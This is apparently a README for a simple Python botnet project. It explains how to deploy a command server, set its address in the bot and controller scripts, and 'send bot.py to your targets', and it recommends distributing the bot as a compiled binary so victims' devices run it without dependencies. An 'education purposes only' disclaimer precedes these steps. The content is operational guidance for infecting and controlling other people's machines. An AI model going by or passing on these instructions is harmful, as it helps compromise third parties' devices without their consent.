/botnet

A simple collection of software to create a botnet.

Primary LanguagePythonMIT LicenseMIT

Botnet Simple Version

This software will help you to create your own botnet.

Warning

THIS SOFTWARE WAS CREATED FOR EDUCATION PERPOSES ONLY.

AUTHOR WILL NOT TAKE RESPONSABILITIES OF ANY HARMS AND/OR DAMAGES CAUSED BY THIS SOFTWARE.

Server

DEFAULT_SECRET_KEY: doyal_baba

Deploy the server.py file to your cloude provider or on your computer. After that change the address on bot.py (Line 6) and botctl.py (Line 3). And you are ready to rock and roll. Just send bot.py to your targets.

Reccomendations

If you distribute bot.py file then you have to make sure that your target device can run python file... But it is reccomended to ditribute the compiled binary (*.exe or *.elf or *.dmg). These kinds of files can be run on any device without dependencies.